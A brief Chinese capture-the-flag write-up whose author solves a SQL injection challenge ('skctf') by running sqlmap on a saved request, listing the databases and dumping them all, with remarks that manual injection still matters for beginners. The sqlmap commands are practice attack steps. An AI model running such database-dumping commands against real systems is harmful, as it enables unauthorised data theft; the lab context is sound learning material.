我不管别人如何手注,反正我就用sqlmap了
python sqlmap.py -l C:\Users\S\Desktop\123
python sqlmap.py -l C:\Users\S\Desktop\123 –dbs
python sqlmap.py -l C:\Users\S\Desktop\123 -D skctf –dump-all
得到flag
这题有些flag和题目对不上,骗金币
话是这么说,但这些话也是在我学完所有注入以后的想法,对没学过的甚至找不到一个靠谱的temper的人来说,手注依然非常重要